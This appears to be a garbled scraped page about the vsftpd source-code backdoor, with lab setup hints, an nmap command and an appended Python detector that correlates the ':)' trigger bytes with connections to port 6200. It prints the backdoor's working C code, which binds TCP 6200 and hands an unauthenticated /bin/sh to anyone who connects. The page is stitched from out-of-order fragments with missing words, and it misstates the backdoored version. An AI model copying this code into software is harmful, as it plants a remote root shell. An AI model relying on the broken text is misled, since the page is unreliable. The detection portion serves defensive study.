On CentOS/RHEL:
was a stable release used in older systems like the VulnHub machine "Stapler".
if __name__ == "__main__": exploit()
Crucially, the vsftpd service often runs with root privileges. Consequently, when an attacker successfully connects to this bind shell, they are immediately granted a command shell with full on the target system.
Review to detect this traffic on your network.
In , something bizarre happened. The official vsftpd source code distribution (vsftpd-2.0.8.tar.gz) was found to contain a backdoor. An unknown attacker had gained access to the source code repository and inserted a malicious payload at the get_reply function.
Technical details
You can clone the vulnerable source from GitHub to your testing machine:
The standard and safest way to create a vulnerable target is to use , a deliberately insecure Linux virtual machine (VM) designed for security training. It includes this vulnerable version of vsftpd. The standard attacker machine is Kali Linux, which comes pre-loaded with the Metasploit Framework and other penetration testing tools.
You must set the target's IP address (RHOSTS).
else if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29)) vsf_sysutil_extra();
nmap -sV -sC -p 21 [target IP]
int vsf_sysutil_extra(void)
{
    int fd, rfd;
    struct sockaddr_in sa;

    if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit(1);
    memset(&sa, 0, sizeof(sa));
    /* Listener on TCP port 6200, all interfaces. */
    sa.sin_family = AF_INET;
    sa.sin_port = htons(6200);
    sa.sin_addr.s_addr = INADDR_ANY;
    if((bind(fd,(struct sockaddr *)&sa, sizeof(struct sockaddr))) < 0) exit(1);
    if((listen(fd, 100)) == -1) exit(1);
    for(;;)
    {
        rfd = accept(fd, 0, 0);
        /* stdin, stdout and stderr are redirected to the accepted socket, then /bin/sh replaces the process. */
        close(0); close(1); close(2);
        dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
        execl("/bin/sh","sh",(char *)0);
    }
}
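The code above leaves two network indicators: the adjacent bytes 0x3a 0x29 on the FTP control channel, and a connection to TCP port 6200 on the FTP server. The following detector correlates them; it is an added example, not code from the original page or from vsftpd. The log format, the 60-second window and the alert names are assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta

TRIGGER = bytes([0x3A, 0x29])    # adjacent bytes tested by the check shown above
BACKDOOR_PORT = 6200             # port bound by vsf_sysutil_extra()
WINDOW = timedelta(seconds=60)   # assumed correlation window

# Constructed events in a hypothetical sensor format:
# timestamp, client IP, server IP, server port, control-channel line ("-" if none)
SAMPLE_EVENTS = """\
2024-01-10T09:00:01 10.0.0.5 10.0.0.20 21 USER alice
2024-01-10T09:00:02 10.0.0.5 10.0.0.20 21 PASS secret
2024-01-10T09:05:10 10.0.0.9 10.0.0.20 21 USER guest:)
2024-01-10T09:05:11 10.0.0.9 10.0.0.20 21 PASS x
2024-01-10T09:05:13 10.0.0.9 10.0.0.20 6200 -
2024-01-10T09:30:00 10.0.0.7 10.0.0.21 6200 -
2024-01-10T09:40:00 10.0.0.8 10.0.0.22 21 USER a:b)
"""

def parse(line):
    """Split one event line into typed fields."""
    ts, src, dst, port, payload = line.split(" ", 4)
    return datetime.fromisoformat(ts), src, dst, int(port), payload

def detect(text):
    """Return (alert_name, client, server) tuples in event order."""
    alerts = []
    last_trigger = {}  # server IP -> time the trigger bytes were last seen
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, payload = parse(line)
        if port == 21 and TRIGGER in payload.encode("utf-8"):
            # Byte pair must be adjacent, as in the p_buf[i] / p_buf[i+1] check.
            last_trigger[dst] = ts
            alerts.append(("trigger-bytes", src, dst))
        elif port == BACKDOOR_PORT:
            seen = last_trigger.get(dst)
            if seen is not None and ts - seen <= WINDOW:
                alerts.append(("shell-port-after-trigger", src, dst))
            else:
                alerts.append(("shell-port-connection", src, dst))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The byte-pair match is command-agnostic, so a benign line that happens to contain those two bytes also raises "trigger-bytes"; the correlated alert is the high-confidence one.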
If the version is , you are compromised or extremely vulnerable.
Exploit examples and tools